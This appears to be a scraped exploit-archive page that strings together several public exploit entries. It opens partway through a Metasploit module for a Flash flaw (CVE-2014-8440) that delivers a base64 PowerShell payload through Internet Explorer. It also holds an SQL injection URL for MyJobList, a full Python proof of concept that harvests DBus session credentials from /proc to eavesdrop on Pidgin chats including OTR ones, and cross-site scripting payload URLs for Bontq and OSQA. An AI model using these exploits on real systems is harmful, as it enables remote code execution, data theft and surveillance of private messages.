['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' }, :arch => ARCH_X86 }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Nov 11 2014', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end
HireHackking

MyJobList 0.1.3 - 'eid' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52168/info MyJobList is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MyJobList 0.1.3 is vulnerable; other versions may also be affected. http://www.example.com/?loc=profile&eid=[SQLi]
HireHackking

libpurple 2.8.10 - OTR Information Disclosure

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52175/info libpurple is prone to an information-disclosure vulnerability. Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks. The following products are vulnerable: libpurple versions prior to 2.10.1 pidgin versions prior to 2.10.1 pidgin-otr versions prior to 3.2.0 #!/usr/bin/env python # PoC for snooping on pidgin discussions (OTR/non-OTR) via dbus # (see CVE-2012-1257) # # requires python-dbus and python-gobject # # based on sample code found here: # http://developer.pidgin.im/wiki/DbusHowto # # Disclaimer: There's virtually no error handling here, # so don't rely on this for any serious work. # # Author: # Dimitris Glynos :: { dimitris at census dash labs dot com } import dbus, gobject, os, sys from dbus.mainloop.glib import DBusGMainLoop # same owner processes get to snoop their respective DBUS credentials # via /proc/<pid>/environ def obtain_dbus_session_creds(): all_pids = [pid for pid in os.listdir('/proc') if pid.isdigit()] env_tmpl = '/proc/%s/environ' session_creds = {} for pid in all_pids: if not (os.stat(env_tmpl % pid).st_uid == os.getuid()): continue if not os.access(env_tmpl % pid, os.R_OK): continue f = open(env_tmpl % pid, 'rb') contents = f.read() f.close() for var in contents.split('\0'): if var.startswith('DBUS_SESSION_BUS_ADDRESS='): val = var[var.index('=')+1:] if not session_creds.has_key(val): session_creds[val] = 1 return session_creds def recvs(account, contact, msg, conversation, flags): print "received '%s' from %s" % (msg, contact) def sends(account, contact, msg, conversation, flags): if flags == 1: print "sent '%s' to %s" % (msg, contact) if not os.environ.has_key('DBUS_SESSION_BUS_ADDRESS'): creds = obtain_dbus_session_creds() if len(creds.keys()) == 0: print >> sys.stderr, ( "error: no dbus session " + "credentials could be recovered." ) sys.exit(1) if len(creds.keys()) > 1: print >> sys.stderr, ( "error: multiple dbus session " + "credentials found!\nPlease rerun with the proper "+ "DBUS_SESSION_BUS_ADDRESS env variable\n" + "Here are the recovered credentials:\n") for k in creds.keys(): print >> sys.stderr, "DBUS_SESSION_BUS_ADDRESS=%s" % k sys.exit(1) os.environ["DBUS_SESSION_BUS_ADDRESS"] = creds.keys()[0] dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) bus = dbus.SessionBus() bus.add_signal_receiver( recvs, dbus_interface="im.pidgin.purple.PurpleInterface", signal_name="ReceivedImMsg" ) bus.add_signal_receiver( sends, dbus_interface="im.pidgin.purple.PurpleInterface", signal_name="WroteImMsg" ) mainloop = gobject.MainLoop() mainloop.run()
HireHackking

Bontq - 'user/' URI Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52183/info Bontq is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/user/user/userinfo/id/2%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.example.com/user/reports/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
HireHackking

OSQA's CMS - Multiple HTML Injection Vulnerabilities

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52184/info OSQA's CMS is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. OSQA 3b is vulnerable; other versions may also be affected. http://www.example.com/questions/ask/ press url bar & put xss code <img src="<img src=search"/onerror=alert("xss")//"> http://www.example.com/questions/ask/ press picture bar & put xss code <img src="<img src=search"/onerror=alert("xss")//">